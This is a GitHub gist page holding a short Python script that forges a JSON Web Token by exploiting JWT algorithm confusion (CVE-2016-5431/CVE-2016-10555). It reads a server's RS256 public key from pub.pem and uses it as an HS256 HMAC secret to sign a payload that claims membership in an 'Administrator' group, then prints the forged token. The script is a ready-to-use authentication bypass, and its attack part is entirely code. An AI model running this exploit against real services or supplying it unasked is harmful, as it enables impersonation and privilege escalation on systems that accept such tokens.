Created
August 5, 2024 02:53
-
-
Save Wind010/5c72d8bdd03ce13b78eec42a3f9eb961 to your computer and use it in GitHub Desktop.
Forge a JWT with a RS256 public key to take advantage of CVE-2016-5431/CVE-2016-10555.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from codecs import encode, decode | |
| import hashlib | |
| import hmac | |
| import json | |
| # https://github.com/FlorianPicca/JWT-Key-Recovery | |
| with open('pub.pem', 'rb') as f: | |
| key = f.read() | |
| header = b'{"typ":"JWT","alg":"HS256"}' | |
| header = encode(header, 'base64').strip() | |
| d_payload = { | |
| "iss": "YOUR_ISSUER", | |
| "user": "doctor.strange", | |
| "groups": [ | |
| "Administrator" | |
| ], | |
| "iat": 1722823008, | |
| "exp": 1722909408, | |
| "jti": "a4254bff-949c-40bc-bad3-b10962b21836" | |
| } | |
| json_payload = json.dumps(d_payload, indent = 4) | |
| payload = encode(json_payload.encode(), 'base64').strip() | |
| # Sign the payload | |
| sig = hmac.new(key, header + b'.' + payload, hashlib.sha256).digest().strip() | |
| sig = encode(sig, 'base64').strip() | |
| # Format the JWT | |
| jwt = '{}.{}.{}'.format(header.decode(), payload.decode(), sig.decode()) | |
| jwt = jwt.replace('=', '') # rfc7515#section-2 | |
| str_key = key.decode('utf-8').replace('\\n', '\n').replace('\\t', '\t') | |
| print(f"Forged Token with public key: ", end="\n") | |
| print(str_key, end='\n\n') | |
| print(jwt) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment